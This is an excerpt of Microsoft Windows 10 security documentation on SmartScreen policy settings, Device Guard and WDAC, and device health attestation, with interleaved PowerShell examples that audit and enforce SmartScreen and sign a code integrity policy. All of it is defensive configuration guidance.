  If you disable or don't configure this policy setting, the employee is prompted to decide whether to turn on SmartScreen Filter during the first-run experience.

Setting: Administrative Templates\Windows Components\Internet Explorer\Prevent bypassing SmartScreen Filter warnings
Supported on: Internet Explorer 8 or later
Description: This policy setting determines whether an employee can bypass warnings from SmartScreen Filter.
  If you enable this policy setting, SmartScreen Filter warnings block the employee.
  If you disable or don't configure this policy setting, the employee can bypass SmartScreen Filter warnings.

Setting: Administrative Templates\Windows Components\Internet Explorer\Prevent bypassing SmartScreen Filter warnings about files that are not commonly downloaded from the Internet
Supported on: Internet Explorer 9 or later
Description: This policy setting determines whether the employee can bypass warnings from SmartScreen Filter. SmartScreen Filter warns the employee about executable files that Internet Explorer users do not commonly download from the Internet.
  If you enable this policy setting, SmartScreen Filter warnings block the employee.
  If you disable or don't configure this policy setting, the employee can bypass SmartScreen Filter warnings.

MDM settings
If you manage your policies using Microsoft Intune, you'll want to use these MDM policy settings. All settings
support both desktop computers (running Windows 10 Pro or Windows 10 Enterprise, enrolled with Microsoft
Intune) and Windows 10 Mobile devices.

For SmartScreen Internet Explorer MDM policies, see Policy CSP - InternetExplorer.

Each entry gives the setting name, the supported versions, and the details (OMA-URI, data type, allowed values).

Setting: AllowSmartScreen
Supported versions: Windows 10
URI full path: ./Vendor/MSFT/Policy/Config/Browser/AllowSmartScreen
Data type: Integer
Allowed values:
  0. Turns off Windows Defender SmartScreen in Edge.
  1. Turns on Windows Defender SmartScreen in Edge.

Setting: EnableAppInstallControl
Supported versions: Windows 10, version 1703
URI full path: ./Vendor/MSFT/Policy/Config/SmartScreen/EnableAppInstallControl
Data type: Integer
Allowed values:
  0. Turns off Application Installation Control, allowing users to download and install files from anywhere on the web.
  1. Turns on Application Installation Control, allowing users to install apps from the Microsoft Store only.

Setting: EnableSmartScreenInShell
Supported versions: Windows 10, version 1703
URI full path: ./Vendor/MSFT/Policy/Config/SmartScreen/EnableSmartScreenInShell
Data type: Integer
Allowed values:
  0. Turns off SmartScreen in Windows for app and file execution.
  1. Turns on SmartScreen in Windows for app and file execution.

Setting: PreventOverrideForFilesInShell
Supported versions: Windows 10, version 1703
URI full path: ./Vendor/MSFT/Policy/Config/SmartScreen/PreventOverrideForFilesInShell
Data type: Integer
Allowed values:
  0. Employees can ignore SmartScreen warnings and run malicious files.
  1. Employees can't ignore SmartScreen warnings and run malicious files.

Setting: PreventSmartScreenPromptOverride
Supported versions: Windows 10, version 1511 and later
URI full path: ./Vendor/MSFT/Policy/Config/Browser/PreventSmartscreenPromptOverride
Data type: Integer
Allowed values:
  0. Employees can ignore SmartScreen warnings.
  1. Employees can't ignore SmartScreen warnings.

Setting: PreventSmartScreenPromptOverrideForFiles
Supported versions: Windows 10, version 1511 and later
URI full path: ./Vendor/MSFT/Policy/Config/Browser/PreventSmartScreenPromptOverrideForFiles
Data type: Integer
Allowed values:
  0. Employees can ignore SmartScreen warnings for files.
  1. Employees can't ignore SmartScreen warnings for files.

Recommended Group Policy and MDM settings for your organization


By default, Windows Defender SmartScreen lets employees bypass warnings. Unfortunately, this can let
employees continue to an unsafe site or to continue to download an unsafe file, even after being warned. Because
of this possibility, we strongly recommend that you set up Windows Defender SmartScreen to block high-risk
interactions instead of providing just a warning.
To better help you protect your organization, we recommend turning on and using these specific Windows
Defender SmartScreen Group Policy and MDM settings.

GROUP POLICY SETTING / RECOMMENDATION

Administrative Templates\Windows Components\Microsoft Edge\Configure Windows Defender SmartScreen
  Enable. Turns on Windows Defender SmartScreen.

Administrative Templates\Windows Components\Microsoft Edge\Prevent bypassing Windows Defender SmartScreen prompts for sites
  Enable. Stops employees from ignoring warning messages and continuing to a potentially malicious website.

Administrative Templates\Windows Components\Microsoft Edge\Prevent bypassing Windows Defender SmartScreen prompts for files
  Enable. Stops employees from ignoring warning messages and continuing to download potentially malicious files.

Administrative Templates\Windows Components\File Explorer\Configure Windows Defender SmartScreen
  Enable with the Warn and prevent bypass option. Stops employees from ignoring warning messages about malicious files downloaded from the Internet.

MDM SETTING / RECOMMENDATION

Browser/AllowSmartScreen
  1. Turns on Windows Defender SmartScreen.

Browser/PreventSmartScreenPromptOverride
  1. Stops employees from ignoring warning messages and continuing to a potentially malicious website.

Browser/PreventSmartScreenPromptOverrideForFiles
  1. Stops employees from ignoring warning messages and continuing to download potentially malicious files.

SmartScreen/EnableSmartScreenInShell
  1. Turns on Windows Defender SmartScreen in Windows. Requires at least Windows 10, version 1703.

SmartScreen/PreventOverrideForFilesInShell
  1. Stops employees from ignoring warning messages about malicious files downloaded from the Internet. Requires at least Windows 10, version 1703.
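The difference between the default and the recommendation above comes down to a handful of registry values: with the File Explorer policy at Warn the user gets a "Run anyway" path, with Warn and prevent bypass (ShellSmartScreenLevel = Block) they do not. The PowerShell below is an added example, not from this topic: Test-SmartScreenPolicy reads each value behind the recommended Group Policy settings and reports whether the machine is at the weak state (not configured, or Warn) or the recommended one, and Set-SmartScreenPolicy writes the recommended values so the two states can be compared on a lab machine. The key and value names are my mapping of the policies to their registry data from the WindowsExplorer.admx and MicrosoftEdge.admx templates, not something the page states; confirm them against the templates before relying on the result, and remember that a domain GPO will overwrite whatever Set-SmartScreenPolicy writes.

```powershell
# Added example, not from the page: audit (and, on a lab machine, set) the registry values behind
# the recommended SmartScreen Group Policy settings. Key/value names are my ADMX-to-registry mapping
# (WindowsExplorer.admx, MicrosoftEdge.admx), not taken from the page; verify before relying on them.
$SmartScreenPolicy = @(
    [pscustomobject]@{ Setting  = 'File Explorer: Configure Windows Defender SmartScreen'
                       Key      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System'
                       Value    = 'EnableSmartScreen'; Expected = 1 }
    # Weak state is 'Warn' (user can click through); recommendation is 'Block'.
    [pscustomobject]@{ Setting  = 'File Explorer: Warn and prevent bypass'
                       Key      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System'
                       Value    = 'ShellSmartScreenLevel'; Expected = 'Block' }
    [pscustomobject]@{ Setting  = 'Edge: Configure Windows Defender SmartScreen'
                       Key      = 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter'
                       Value    = 'EnabledV9'; Expected = 1 }
    [pscustomobject]@{ Setting  = 'Edge: Prevent bypassing prompts for sites'
                       Key      = 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter'
                       Value    = 'PreventOverride'; Expected = 1 }
    [pscustomobject]@{ Setting  = 'Edge: Prevent bypassing prompts for files'
                       Key      = 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter'
                       Value    = 'PreventOverrideAppRepUnknown'; Expected = 1 }
)

function Test-SmartScreenPolicy {
    foreach ($p in $SmartScreenPolicy) {
        $actual = $null
        if (Test-Path -LiteralPath $p.Key) {
            $actual = (Get-ItemProperty -LiteralPath $p.Key -Name $p.Value -ErrorAction SilentlyContinue).($p.Value)
        }
        $status = if ($null -eq $actual) { 'NOT CONFIGURED: user-changeable, warnings can be bypassed' }
                  elseif ("$actual" -eq "$($p.Expected)") { 'OK' }
                  else { "WEAK: is '$actual', recommendation is '$($p.Expected)'" }
        [pscustomobject]@{
            Setting       = $p.Setting
            RegistryValue = "$($p.Key)\$($p.Value)"
            Actual        = $actual
            Status        = $status
        }
    }
}

function Set-SmartScreenPolicy {
    # Writes the recommended values directly (elevated prompt). Lab use only: GPO will overwrite these.
    foreach ($p in $SmartScreenPolicy) {
        if (-not (Test-Path -LiteralPath $p.Key)) { New-Item -Path $p.Key -Force | Out-Null }
        $type = if ($p.Expected -is [int]) { 'DWord' } else { 'String' }
        New-ItemProperty -LiteralPath $p.Key -Name $p.Value -Value $p.Expected -PropertyType $type -Force | Out-Null
    }
}

Test-SmartScreenPolicy | Format-Table -AutoSize -Wrap
```

Run Test-SmartScreenPolicy before and after the GPO refresh; a row that reads WEAK with ShellSmartScreenLevel = Warn is the state the page warns about, where the employee is warned but can still continue.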

Related topics
Threat protection
Windows Defender SmartScreen overview
Available Group Policy and Mobile Device Management (MDM) settings for Microsoft Edge

Set up and use Windows Defender SmartScreen on individual devices
4/5/2019 • 3 minutes to read

Applies to:
Windows 10, version 1703
Windows 10 Mobile
Windows Defender SmartScreen helps to protect your employees if they try to visit sites previously reported as
phishing or malware websites, or if an employee tries to download potentially malicious files.

How employees can use Windows Security to set up Windows Defender SmartScreen


Starting with Windows 10, version 1703 your employees can use Windows Security to set up Windows Defender
SmartScreen for an individual device; unless you've used Group Policy or Microsoft Intune to prevent it.

NOTE
If any of the following settings are managed through Group Policy or mobile device management (MDM) settings, it appears
as unavailable to the employee.

To use Windows Security to set up Windows Defender SmartScreen on a device


1. Open the Windows Security app, and then click App & browser control.
2. In the App & browser control screen, choose from the following options:
In the Check apps and files area:
Block. Stops employees from downloading and running unrecognized apps and files from the
web.
Warn. Warns employees that the apps and files being downloaded from the web are
potentially dangerous, but allows the action to continue.
Off. Turns off SmartScreen, so an employee isn't alerted or stopped from downloading
potentially malicious apps and files.
In the SmartScreen for Microsoft Edge area:
Block. Stops employees from downloading and running unrecognized apps and files from the
web, while using Microsoft Edge.
Warn. Warns employees that sites and downloads are potentially dangerous, but allows the
action to continue while running in Microsoft Edge.
Off. Turns off SmartScreen, so an employee isn't alerted or stopped from downloading
potentially malicious apps and files.
In the SmartScreen from Microsoft Store apps area:
Warn. Warns employees that the sites and downloads used by Microsoft Store apps are
potentially dangerous, but allows the action to continue.
Off. Turns off SmartScreen, so an employee isn't alerted or stopped from visiting sites or from
downloading potentially malicious apps and files.

How SmartScreen works when an employee tries to run an app
Windows Defender SmartScreen checks the reputation of any web-based app the first time it's run from the
Internet, checking digital signatures and other factors against a Microsoft-maintained service. If an app has no
reputation or is known to be malicious, SmartScreen can warn the employee or block the app from running
entirely, depending on how you've configured the feature to run in your organization.
By default, your employees can bypass SmartScreen protection, letting them run legitimate apps after accepting a
warning message prompt. You can also use Group Policy or Microsoft Intune to block employees from using
unrecognized apps, or to entirely turn off Windows Defender SmartScreen (not recommended).
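The settings table at the top of this section and the Windows Security options above describe the same three states (Block, Warn, Off) and the policy that locks them. The following PowerShell is an added example, not code from the Microsoft page: it audits the effective SmartScreen state and, when run elevated, enforces Block through the Group Policy registry values that the "Configure Windows Defender SmartScreen" and Microsoft Edge phishing-filter policies write (EnableSmartScreen and ShellSmartScreenLevel under HKLM\SOFTWARE\Policies\Microsoft\Windows\System; EnabledV9 and PreventOverride under HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter). Those paths are not listed on this page; the assumption that an enabled policy with no level set behaves as Warn is mine.

```powershell
# Added example (not part of the Microsoft page): audit and enforce Windows
# Defender SmartScreen through the Group Policy registry values behind the
# settings described above. Paths/value names are the ones the SmartScreen
# policies write; they are not listed on the page. Run elevated to write HKLM.

$ShellPolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System'
$EdgePolicyKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter'
# Non-policy value the employee changes from Windows Security > App & browser control
$ShellUserKey   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer'

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # $null means "not configured", which is different from "configured to 0".
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Get-SmartScreenPolicyState {
    $enable         = Get-RegValue $ShellPolicyKey 'EnableSmartScreen'
    $level          = Get-RegValue $ShellPolicyKey 'ShellSmartScreenLevel'
    $user           = Get-RegValue $ShellUserKey   'SmartScreenEnabled'
    $edgeOn         = Get-RegValue $EdgePolicyKey  'EnabledV9'
    $edgeNoOverride = Get-RegValue $EdgePolicyKey  'PreventOverride'

    # A policy value wins over the user's choice and greys out the control in
    # Windows Security, as the note above says. Assumed: enabled policy with no
    # level set behaves as Warn.
    $effective = if ($null -ne $enable) {
        if ($enable -eq 1) { if ($level) { $level } else { 'Warn' } } else { 'Off' }
    } elseif ($user) { $user } else { 'Warn (default)' }

    [pscustomobject]@{
        ShellPolicyConfigured   = ($null -ne $enable)
        ShellEffectiveMode      = $effective
        UserCanOverrideFileWarn = ($effective -ne 'Block')
        EdgePolicyConfigured    = ($null -ne $edgeOn)
        EdgeSmartScreenOn       = ($edgeOn -eq 1)
        EdgeOverridePrevented   = ($edgeNoOverride -eq 1)
    }
}

function Set-SmartScreenPolicy {
    param(
        [ValidateSet('Warn','Block')][string]$Level = 'Block',
        [switch]$EdgePreventOverride
    )
    foreach ($k in $ShellPolicyKey, $EdgePolicyKey) {
        if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null }
    }
    # Same effect as SmartScreen/EnableSmartScreenInShell = 1 ...
    New-ItemProperty -Path $ShellPolicyKey -Name EnableSmartScreen -PropertyType DWord -Value 1 -Force | Out-Null
    # ... and, with $Level = 'Block', as SmartScreen/PreventOverrideForFilesInShell = 1
    New-ItemProperty -Path $ShellPolicyKey -Name ShellSmartScreenLevel -PropertyType String -Value $Level -Force | Out-Null
    New-ItemProperty -Path $EdgePolicyKey -Name EnabledV9 -PropertyType DWord -Value 1 -Force | Out-Null
    if ($EdgePreventOverride) {
        # Stops "continue anyway" for both flagged sites and unknown downloads in Edge
        New-ItemProperty -Path $EdgePolicyKey -Name PreventOverride -PropertyType DWord -Value 1 -Force | Out-Null
        New-ItemProperty -Path $EdgePolicyKey -Name PreventOverrideAppRepUnknown -PropertyType DWord -Value 1 -Force | Out-Null
    }
}

# Usage: audit first, then enforce and confirm UserCanOverrideFileWarn is False.
Get-SmartScreenPolicyState | Format-List
# Set-SmartScreenPolicy -Level Block -EdgePreventOverride
# Get-SmartScreenPolicyState | Format-List
```

Run the audit on a sample of devices before enforcing: a machine where ShellPolicyConfigured is False but ShellEffectiveMode is Off is one where an employee has already switched SmartScreen off from Windows Security, which is exactly the case the policy value closes.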

How employees can report websites as safe or unsafe
You can configure Windows Defender SmartScreen to warn employees before they go to a potentially dangerous site.
Employees can then choose to report a website as safe from the warning message, or as unsafe from within
Microsoft Edge and Internet Explorer 11.
To report a website as safe from the warning message
On the warning screen for the site, click More Information, and then click Report that this site does not
contain threats. The site info is sent to the Microsoft feedback site, which provides further instructions.
To report a website as unsafe from Microsoft Edge
If a site seems potentially dangerous, employees can report it to Microsoft by clicking More (...), clicking Send
feedback, and then clicking Report unsafe site.
To report a website as unsafe from Internet Explorer 11
If a site seems potentially dangerous, employees can report it to Microsoft by clicking on the Tools menu,
clicking Windows Defender SmartScreen, and then clicking Report unsafe website.

Related topics
Threat protection
Windows Defender SmartScreen overview

Device Guard: Windows Defender Application Control and virtualization-based protection of code integrity
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Windows 10 includes a set of hardware and OS technologies that, when configured together, allow enterprises to
"lock down" Windows systems so they operate with many of the properties of mobile devices. In this
configuration, specific technologies work together to restrict devices to only run authorized apps by using a feature
called configurable code integrity, while simultaneously hardening the OS against kernel memory attacks through
the use of virtualization-based protection of code integrity (more specifically, HVCI).
Configurable code integrity policies and HVCI are very powerful protections that can be used separately. However,
when these two technologies are configured to work together, they present a very strong protection capability for
Windows 10 devices. This combined "configuration state" of configurable code integrity and HVCI has been
referred to as Windows Defender Device Guard.
Using configurable code integrity to restrict devices to only authorized apps has these advantages over other
solutions:
1. Configurable code integrity policy is enforced by the Windows kernel itself. As such, the policy takes effect early
in the boot sequence before nearly all other OS code and before traditional antivirus solutions run.
2. Configurable code integrity allows customers to set application control policy not only over code running in
user mode, but also kernel mode hardware and software drivers and even code that runs as part of Windows.
3. Customers can protect the configurable code integrity policy even from local administrator tampering by
digitally signing the policy. This would mean that changing the policy would require both administrative
privilege and access to the organization's digital signing process, making it extremely difficult for an attacker
with administrative privilege, or malicious software that managed to gain administrative privilege, to alter the
application control policy.
4. The entire configurable code integrity enforcement mechanism can be protected by HVCI, where even if a
vulnerability exists in kernel mode code, the likelihood that an attacker could successfully exploit it is
significantly diminished. Why is this relevant? That’s because an attacker that compromises the kernel would
otherwise have enough privilege to disable most system defenses and override the application control policies
enforced by configurable code integrity or any other application control solution.
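The four advantages above correspond to concrete steps in a configurable code integrity (WDAC) deployment: scanning a reference image into a policy that covers user-mode code as well as drivers (point 2), auditing before enforcing (point 1), and signing the policy so an administrator cannot replace it (point 3). The following PowerShell is an added example, not code from the Microsoft page or from the ConfigCI module documentation; it uses the ConfigCI cmdlets shipped with Windows 10 and signtool from the Windows SDK. The file paths and the certificate name are placeholders chosen for this example.

```powershell
# Added example (not from the Microsoft page): create a WDAC policy in audit
# mode from a reference machine, review what it would have blocked, then
# enforce it and require the policy itself to be signed. Paths and the
# certificate are placeholders for this example. Run elevated.

Import-Module ConfigCI   # ConfigCI ships with Windows 10 / Server 2016

$PolicyXml = 'C:\WDAC\ReferencePolicy.xml'
$PolicyBin = 'C:\WDAC\SIPolicy.bin'
$SignerCer = 'C:\WDAC\ContosoWDACSigner.cer'   # placeholder: public cert of the policy-signing key

function New-AuditPolicy {
    # Trust by publisher, fall back to file hash for unsigned binaries.
    # -UserPEs puts user-mode code under the policy, not only drivers (point 2).
    New-CIPolicy -Level Publisher -Fallback Hash -UserPEs `
        -ScanPath 'C:\Windows' -FilePath $PolicyXml
    Set-RuleOption -FilePath $PolicyXml -Option 3    # Enabled:Audit Mode (log, do not block)
    Set-RuleOption -FilePath $PolicyXml -Option 9    # Enabled:Advanced Boot Options Menu (recovery path)
    Set-RuleOption -FilePath $PolicyXml -Option 10   # Enabled:Boot Audit on Failure
    ConvertFrom-CIPolicy -XmlFilePath $PolicyXml -BinaryFilePath $PolicyBin
}

function Get-AuditBlocks {
    # In audit mode, each file the policy would have blocked is logged as
    # event 3076 in the CodeIntegrity channel. Review these before enforcing.
    Get-WinEvent -LogName 'Microsoft-Windows-CodeIntegrity/Operational' -ErrorAction SilentlyContinue |
        Where-Object Id -eq 3076 |
        Select-Object TimeCreated, Message
}

function ConvertTo-EnforcedSignedPolicy {
    Set-RuleOption -FilePath $PolicyXml -Option 3 -Delete   # leave audit mode: violations now block
    # Option 6 = Enabled:Unsigned System Integrity Policy. Deleting it means the
    # kernel accepts only a policy signed by a signer listed under
    # UpdatePolicySigners, so an admin cannot drop in a permissive unsigned
    # policy (point 3). -Update adds the signer for policy updates only; it does
    # not authorise code signed by that certificate to run.
    Set-RuleOption -FilePath $PolicyXml -Option 6 -Delete
    Add-SignerRule -FilePath $PolicyXml -CertificatePath $SignerCer -Update
    ConvertFrom-CIPolicy -XmlFilePath $PolicyXml -BinaryFilePath $PolicyBin

    # Detached PKCS#7 signature with the code-integrity policy EKU; signtool
    # writes SIPolicy.bin.p7 next to the input. Cert name is a placeholder.
    & signtool.exe sign /v /n 'ContosoWDACSigner' /p7 'C:\WDAC' `
        /p7co 1.3.6.1.4.1.311.79.1 /fd sha256 $PolicyBin

    # Single-policy format location; the policy takes effect at next boot.
    Copy-Item "$PolicyBin.p7" 'C:\Windows\System32\CodeIntegrity\SIPolicy.p7b' -Force
}

# Usage (over days, not minutes): build and deploy the audit policy, let the
# fleet run, read the 3076 events, add rules for legitimate blocked files,
# then enforce and sign.
New-AuditPolicy
# Get-AuditBlocks | Format-Table -AutoSize
# ConvertTo-EnforcedSignedPolicy
```

Two operational points follow from the text. Once option 6 is removed and the policy is signed, losing access to the signing key means the policy can no longer be updated or removed by any administrator, which is the intended property, so keep the key in an HSM with a documented update process. And HVCI (point 4) is enabled separately from this policy; the Device Guard health check later in this document shows how to confirm it is actually running.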

(Re-)Introducing Windows Defender Application Control
When we originally designed the configuration state that we have referred to as Windows Defender Device Guard,
we did so with a specific security promise in mind. Although there were no direct dependencies between the two
main OS features of the Device Guard configuration, configurable code integrity and HVCI, we intentionally
focused our discussion around the Device Guard lockdown state you achieve when deploying them together.
However, the use of the term Device Guard to describe this configuration state has unintentionally left an
impression for many IT professionals that the two features were inexorably linked and could not be deployed
separately. Additionally, given that HVCI relies on Windows virtualization-based security, it comes with additional
hardware, firmware, and kernel driver compatibility requirements that some older systems can’t meet.
As a result, many IT Professionals assumed that because some systems couldn't use HVCI, they couldn’t use
configurable code integrity either. But configurable code integrity carries no specific hardware or software
requirements other than running Windows 10, which means many IT professionals were wrongly denied the
benefits of this powerful application control capability.
Since the initial release of Windows 10, the world has witnessed numerous hacking and malware attacks where
application control alone could have prevented the attack altogether. With this in mind, we are discussing and
documenting configurable code integrity as an independent technology within our security stack and giving it a
name of its own: Windows Defender Application Control. We hope this change will help us better communicate
options for adopting application control within an organization.
Does this mean the Windows Defender Device Guard configuration state is going away? Not at all. The term Device
Guard will continue to be used as a way to describe the fully locked down state achieved through the use of
Windows Defender Application Control (WDAC), HVCI, and hardware and firmware security features. It also
allows us to work with our OEM partners to identify specifications for devices that are "Device Guard capable" so
that our joint customers can easily purchase devices that meet all of the hardware and firmware requirements of
the original "Device Guard" locked down scenario for Windows 10 based devices.

Related topics
Windows Defender Application Control
Dropping the Hammer Down on Malware Threats with Windows 10’s Windows Defender Device Guard
Driver compatibility with Windows Defender Device Guard in Windows 10
Code integrity
Control the health of Windows 10-based devices
3/19/2019 • 61 minutes to read

Applies to
Windows 10
This article details an end-to-end solution that helps you protect high-value assets by enforcing, controlling, and
reporting the health of Windows 10-based devices.

Introduction
In Bring Your Own Device (BYOD) scenarios, employees bring commercially available devices to access both work-
related resources and their personal data. Users want to use the device of their choice to access the organization’s
applications, data, and resources not only from the internal network but also from anywhere. This phenomenon is
also known as the consumerization of IT.
Users want to have the best productivity experience when accessing corporate applications and working on
organization data from their devices. That means they will not tolerate being prompted to enter their work
credentials each time they access an application or a file server. From a security perspective, it also means that
users will manipulate corporate credentials and corporate data on unmanaged devices.
With the increased use of BYOD, there will be more unmanaged and potentially unhealthy systems accessing
corporate services, internal resources, and cloud apps.
Even managed devices can be compromised and become harmful. Organizations need to detect when security has
been breached and react as early as possible in order to protect high-value assets.
As Microsoft moves forward, security investments are increasingly focused on security preventive defenses and
also on detection and response capabilities.
Windows 10 is an important component of an end-to-end security solution that focuses not only on the
implementation of security preventive defenses, but adds device health attestation capabilities to the overall
security strategy.

Description of a robust end-to-end security solution
Today’s computing threat landscape is increasing at a speed never encountered before. The sophistication of
criminal attacks is growing, and there is no doubt that malware now targets both consumers and professionals in
all industries.
During recent years, one particular category of threat has become prevalent: advanced persistent threats (APTs).
The term APT is commonly used to describe any attack that seems to target individual organizations on an
ongoing basis. In fact, this type of attack typically involves determined adversaries who may use any methods or
techniques necessary.
With the BYOD phenomena, a poorly maintained device represents a target of choice. For an attacker, it’s an easy
way to breach the security network perimeter, gain access to, and then steal high-value assets.
The attackers target individuals, not specifically because of who they are, but because of who they work for. An
infected device will bring malware into an organization, even if the organization has hardened the perimeter of
networks or has invested in its defensive posture. A defensive strategy is not sufficient against these threats.
A different approach
Rather than the traditional focus on the prevention of compromise, an effective security strategy assumes that
determined adversaries will successfully breach any defenses. It means that it’s necessary to shift focus away from
preventative security controls to detection of, and response to, security issues. The implementation of the risk
management strategy, therefore, balances investment in prevention, detection, and response.
Because mobile devices are increasingly being used to access corporate information, some way to evaluate device
security or health is required. This section describes how to provision device health assessment in such a way that
high-value assets can be protected from unhealthy devices.
Devices that are used to access corporate resources must be trusted. An efficient end-to-end security approach is
able to evaluate device health and use the current security state when granting access to a high-value asset.

A robust design needs to establish the user’s identity, strengthen the authentication method if needed, and learn
behavior like the network location the user regularly connects from. Also, a modern approach must be able to
release sensitive content only if user devices are determined to be healthy and secure.
The following figure shows a solution built to assess device health from the cloud. The device authenticates the
user through a connection to an identity provider in the cloud. If the managed asset contains highly confidential
information, the conditional access engine of the identity provider may elect to verify the security compliance of the
mobile device before access is granted. The user's device is able to prove its health status, which can be sent at any
time or when mobile device management (MDM) requests it.

Windows devices can be protected from low-level rootkits and bootkits by using low-level hardware technologies
such as Unified Extensible Firmware Interface (UEFI) Secure Boot.
Secure Boot is a firmware validation process that helps prevent rootkit attacks; it is part of the UEFI specification.
The intent of UEFI is to define a standard way for the operating system to communicate with modern hardware,
which can perform faster and with more efficient input/output (I/O) functions than older, software interrupt-driven
BIOS systems.
A device health attestation module can communicate measured boot data that is protected by a Trusted Platform
Module (TPM) to a remote service. After the device successfully boots, boot process measurement data is sent to a
trusted cloud service (Health Attestation Service) using a more secure and tamper-resistant communication
channel.
Remote health attestation service performs a series of checks on the measurements. It validates security related
data points, including boot state (Secure Boot, Debug Mode, and so on), and the state of components that manage
security (BitLocker, Device Guard, and so on). It then conveys the health state of the device by sending a health
encrypted blob back to the device.
An MDM solution typically applies configuration policies and deploys software to devices. MDM defines the
security baseline and knows the level of compliance of the device with regular checks to see what software is
installed and what configuration is enforced, as well as determining the health status of the device.
An MDM solution asks the device to send device health information and forward the health encrypted blob to the
remote health attestation service. The remote health attestation service verifies device health data, checks that
MDM is communicating to the same device, and then issues a device health report back to the MDM solution.
An MDM solution evaluates the health assertions and, depending on the health rules belonging to the
organization, can decide if the device is healthy. If the device is healthy and compliant, MDM passes that
information to the identity provider so the organization’s access control policy can be invoked to grant access.
Access to content is then authorized to the appropriate level of trust for whatever the health status and other
conditional elements indicate.
Depending on the requirements and the sensitivity of the managed asset, device health status can be combined
with user identity information when processing an access request. Access to content is then authorized to the
appropriate level of trust. The Conditional Access engine may be structured to allow additional verification as
needed by the sensitivity of the managed asset. For example, if access to high-value data is requested, additional
security authentication may need to be established by querying the user to answer a phone call before access is
granted.
Microsoft’s security investments in Windows 10
In Windows 10, there are three pillars of investments:
Secure identities. Microsoft is part of the FIDO Alliance which aims to provide an interoperable method of
secure authentication by moving away from the use of passwords for authentication, both on the local system
as well as for services like on-premises resources and cloud resources.
Information protection. Microsoft is making investments to allow organizations to have better control over
who has access to important data and what they can do with that data. With Windows 10, organizations can
take advantage of policies that specify which applications are considered to be corporate applications and can
be trusted to access secure data.
Threat resistance. Microsoft is helping organizations to better secure enterprise assets against the threats of
malware and attacks by using security defenses relying on hardware.
Protect, control, and report on the security status of Windows 10-based devices
This section is an overview that describes different parts of the end-to-end security solution that helps protect
high-value assets and information from attackers and malware.
The numbered parts of the solution are:

1. Windows 10-based device. The first time a Windows 10-based device is powered on, the out-of-box experience (OOBE) screen is displayed. During setup, the device can be automatically registered into Azure Active Directory (AD) and enrolled in MDM.
A Windows 10-based device with TPM can report health status at any time by using the Health Attestation Service available with all editions of Windows 10.

2. Identity provider. Azure AD contains the users, registered devices, and registered applications of the organization's tenant. A device always belongs to a user and a user can have multiple devices. A device is represented as an object with different attributes, like the compliance status of the device. A trusted MDM can update the compliance status.
Azure AD is more than a repository. Azure AD is able to authenticate users and devices and can also authorize access to managed resources. Azure AD has a conditional access control engine that leverages the identity of the user, the location of the device and also the compliance status of the device when making a trusted access decision.

3. Mobile device management. Windows 10 has MDM support that enables the device to be managed out-of-box without deploying any agent. MDM can be Microsoft Intune or any third-party MDM solution that is compatible with Windows 10.

4. Remote health attestation. The Health Attestation Service is a trusted cloud service operated by Microsoft that performs a series of health checks and reports to MDM what Windows 10 security features are enabled on the device.
Security verification includes boot state (WinPE, Safe Mode, Debug/test modes) and components that manage security and integrity of runtime operations (BitLocker, Device Guard).

5. Enterprise managed asset. The enterprise managed asset is the resource to protect. For example, the asset can be Office 365, other cloud apps, on-premises web resources published by Azure AD, or even VPN access.
The combination of Windows 10-based devices, identity provider, MDM, and remote health attestation creates a
robust end-to-end-solution that provides validation of health and compliance of devices that access high-value
assets.

Protect devices and enterprise credentials against threats

This section describes what Windows 10 offers in terms of security defenses and which of those controls can be
measured and reported on.
Windows 10 hardware-based security defenses
The most aggressive forms of malware try to insert themselves into the boot process as early as possible so that
they can take control of the operating system early and prevent protection mechanisms and antimalware software
from working. This type of malicious code is often called a rootkit or bootkit. The best way to avoid having to deal
with low-level malware is to secure the boot process so that the device is protected from the very start. Windows
10 supports multiple layers of boot protection. Some of these features are available only if specific types of
hardware are installed. For more information, see the Hardware requirements section.

Windows 10 supports features to help prevent sophisticated low-level malware like rootkits and bootkits from
loading during the startup process:
Trusted Platform Module. A Trusted Platform Module (TPM) is a hardware component that provides
unique security features.
Windows 10 leverages security characteristics of a TPM for measuring boot integrity sequence (and based
on that, unlocking automatically BitLocker protected drives), for protecting credentials or for health
attestation.
A TPM implements controls that meet the specification described by the Trusted Computing Group (TCG).
At the time of this writing, there are two versions of the TPM specification produced by the TCG that are not
compatible with each other:
The first TPM specification, version 1.2, was published in February 2005 by the TCG and standardized
under the ISO/IEC 11889 standard.
The latest TPM specification, referred to as TPM 2.0, was released in April 2014 and has been approved
by the ISO/IEC Joint Technical Committee (JTC) as ISO/IEC 11889:2015.
Windows 10 uses the TPM for cryptographic calculations as part of health attestation and to protect the
keys for BitLocker, Windows Hello, virtual smart cards, and other public key certificates. For more
information, see TPM requirements in Windows 10.
Windows 10 recognizes versions 1.2 and 2.0 TPM specifications produced by the TCG. For the most recent
and modern security features, Windows 10 supports only TPM 2.0.
TPM 2.0 provides a major revision to the capabilities over TPM 1.2:
  Update crypto strength to meet modern security needs
    Support for SHA-256 for PCRs
    Support for HMAC command
  Cryptographic algorithm flexibility to support government needs
    TPM 1.2 is severely restricted in terms of what algorithms it can support
    TPM 2.0 can support arbitrary algorithms with minor updates to the TCG specification documents
  Consistency across implementations
    The TPM 1.2 specification allows vendors wide latitude when choosing implementation details
    TPM 2.0 standardizes much of this behavior
Secure Boot. Devices with UEFI firmware can be configured to load only trusted operating system
bootloaders. Secure Boot does not require a TPM.
The most basic protection is the Secure Boot feature, which is a standard part of the UEFI 2.2+ architecture.
On a PC with conventional BIOS, anyone who can take control of the boot process can boot by using an
alternative OS loader, and potentially gain access to system resources. When Secure Boot is enabled, you
can boot using only an OS loader that’s signed using a certificate stored in the UEFI Secure Boot DB.
